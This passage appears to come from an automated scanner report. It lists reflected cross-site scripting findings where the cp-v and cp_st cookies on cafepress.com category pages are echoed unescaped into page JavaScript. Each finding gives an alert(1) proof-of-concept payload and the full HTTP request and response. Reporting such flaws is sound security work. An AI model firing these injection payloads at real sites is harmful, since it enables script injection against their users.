2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";


   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA4ab65"-alert(1)-"48e2c7462b";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {

       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.17. http://www.cafepress.com/+bags [cp_st cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/+bags

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 91e0a</script><script>alert(1)</script>2ef0362a154 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /+bags HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=91e0a</script><script>alert(1)</script>2ef0362a154; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW28
ntCoent-Length: 59583
Date: Sun, 26 Dec 2010 13:47:16 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:16 GMT; path=/
Set-Cookie: cp_sc=100104; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:16 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59583

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
= 'cafepress.com';

window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'SearchResults'
window.cafepress.tealeaf.searchTerm = '91e0a</script><script>alert(1)</script>2ef0362a154'
window.cafepress.tealeaf.salesChannel = 'Marketplace'
window.cafepress.tealeaf.trafficMedium = 'SEO'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C
...[SNIP]...

1.18. http://www.cafepress.com/+boxers [cp-v cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/+boxers

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload baa43"-alert(1)-"4cc6f92795 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /+boxers HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BAbaa43"-alert(1)-"4cc6f92795; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW21
Cteonnt-Length: 59461
Date: Sun, 26 Dec 2010 13:47:31 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:31 GMT; path=/
Set-Cookie: cp_sc=100074; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:31 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59461

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";


   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BAbaa43"-alert(1)-"4cc6f92795";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {

       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.19. http://www.cafepress.com/+boxers [cp_st cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/+boxers

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d6727</script><script>alert(1)</script>52729b93123 was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /+boxers HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=d6727</script><script>alert(1)</script>52729b93123; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW20
Cteonnt-Length: 59479
Date: Sun, 26 Dec 2010 13:47:26 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:26 GMT; path=/
Set-Cookie: cp_sc=100074; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:17:26 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59479

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
= 'cafepress.com';

window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'SearchResults'
window.cafepress.tealeaf.searchTerm = 'd6727</script><script>alert(1)</script>52729b93123'
window.cafepress.tealeaf.salesChannel = 'Marketplace'
window.cafepress.tealeaf.trafficMedium = 'SEO'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C
...[SNIP]...

1.20. http://www.cafepress.com/+bumper-stickers [cp-v cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/+bumper-stickers

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 350cc"-alert(1)-"5204568fc11 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /+bumper-stickers HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA350cc"-alert(1)-"5204568fc11; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW13
Cteonnt-Length: 59754
Date: Sun, 26 Dec 2010 13:48:57 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:56 GMT; path=/
Set-Cookie: cp_sc=100193; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:56 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59754

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
2:T,EXP_10_03:T,EXP_10_04:C,EXP_10_05:T,EXP_10_06:T,EXP_10_07:C,EXP_10_08:C,EXP_10_09:C,EXP_10_10:C,EXP_CB_05_10:T";


   s.eVar30 = "A8D8655B7B25F13535D4E6E67BEC27E9:D0026F27AADDAF9A26C54608326FC1BA350cc"-alert(1)-"5204568fc11";

   s.eVar26 =(window.om_eVar26?getMyVal(window.om_eVar26, ""): ""); //CafePress PID
   if (s.eVar26 == "")
   {

       if ("" == "affiliate")
       {
           s.eVar26 = "2099"; //2099 = affiliate
       }
       el
...[SNIP]...

1.21. http://www.cafepress.com/+bumper-stickers [cp_st cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/+bumper-stickers

Issue detail

The value of the cp_st cookie is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 144cb</script><script>alert(1)</script>4632a294b1c was submitted in the cp_st cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /+bumper-stickers HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=144cb</script><script>alert(1)</script>4632a294b1c; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; __utmv-UA-12011589-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=932760925=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; jid=0; __utmc=265344797; __utmb=265344797.4.10.1293371029; ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; __utmz_sweepery=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __utmb_sweepery=1.2.10.1293371031; cppss=3x0; __utmz=265344797.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; xid=0; s_sq=%5B%5BB%5D%5D; cpv=97a75f43-ae66-493c-bd08-bcb4040ae8a9; __utma_sweepery=1.208119724.1293371031.1293371031.1293371031.1; __utmz-UA-11730150-1=1.1293371031.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; __cmbTpvTm=1711; cp-v=D0026F27AADDAF9A26C54608326FC1BA; cpvr=14e1645f-fd9a-4af6-a2eb-e27d1e0a22bb; cppid=5185601; tfx_ltch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utmc_sweepery=1; __utmv_sweepery=1.709a776c-1980-4200-bb45-6295fbe3346d-banner; s_vi=[CS]v1|268BA352851D38A0-4000013900281F45[CE]; pid.guid=fbf640c2-b5e5-4f84-ab37-bad443d79e2e; __utmc-UA-11730150-1=1; e42fa020-5630-012d-f588-1231390471a5=%7B%22loadCount%22%3A1%7D; __utmb-UA-12011589-1=1.2.10.1293371032;

Response

HTTP/1.1 200 OK
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/7.0
X-AspNet-Version: 2.0.50727
CP: LVW27
ntCoent-Length: 59771
Date: Sun, 26 Dec 2010 13:48:55 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: cp_st=; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:55 GMT; path=/
Set-Cookie: cp_sc=100193; domain=cafepress.com; expires=Sun, 26-Dec-2010 14:18:55 GMT; path=/
Set-Cookie: cppss=3x0; domain=cafepress.com; path=/
Set-Cookie: ASP.NET_SessionId=xk2qlwn3vjv1w145wr1zai45; domain=cafepress.com; path=/
Cache-Control: private
Content-Length: 59771

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
<meta h
...[SNIP]...
= 'cafepress.com';

window.cafepress.originCountryCode = 'US'

window.cafepress.tealeaf = {};
window.cafepress.tealeaf.pageLandingType = 'SearchResults'
window.cafepress.tealeaf.searchTerm = '144cb</script><script>alert(1)</script>4632a294b1c'
window.cafepress.tealeaf.salesChannel = 'Marketplace'
window.cafepress.tealeaf.trafficMedium = 'SEO'
window.cafepress.tealeaf.utmTracking = ''
window.cafepress.tealeaf.abTestString = 'EXP_08_00:C
...[SNIP]...

1.22. http://www.cafepress.com/+buttons [cp-v cookie] previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.cafepress.com
Path:	/+buttons

Issue detail

The value of the cp-v cookie is copied into a JavaScript string which is encapsulated in double quotation marks. The payload e64e3"-alert(1)-"4f4360aac81 was submitted in the cp-v cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Remediation detail

Request

GET /+buttons HTTP/1.1
Host: www.cafepress.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: utm_medium=productfeed; __cmbU=ABJeb1_q_xWtlMkwHeWRUecd7IsvIC6gBr062GuSCgzpGCIkXHWlsanGWQ2dq8pvZH_3lJ8NxpV8MpKCm8WjK09C-M-UKAhkNw; cp_sc=100007; __utma-UA-11730150-1=1.1938780631.1293371031.1293371031.1293371031.1; __utmc-UA-12011589-1=1; __cmbDomTm=0; s_cc=true; __utmb-UA-11730150-1=1.2.10.1293371031; __utma-UA-12011589-1=1.932760925.1293371032.1293371032.1293371032.1; __utmv-UA-11730150-1=1.Marketplace%2C%20ProductDetails%2C%20TheGamingApe|1=CP_Visitor_ID=fbf640c2-b5e5-4f84-ab37-bad443d79e2e=1,2=GA_Visitor_ID=1938780631=1,4=GWO_Marker=Placeholder=1,5=AB_Test_Marker=EXP_10_09_C-EXP_10_10_C-EXP_CB_05_10_T=1,; __utmz-UA-12011589-1=1.1293371032.1.1.utmcsr=ChannelAdvisor_US_become|utmccn=Light%20T-Shirt|utmcmd=productfeed|utmctr=299007536; cp_st=; tfx_touch=2%2cchanneladvisor_us_become%2c20101226054401%2c; __utma=265344797.1253024374.1293371029.1293371029.1293371029.1; 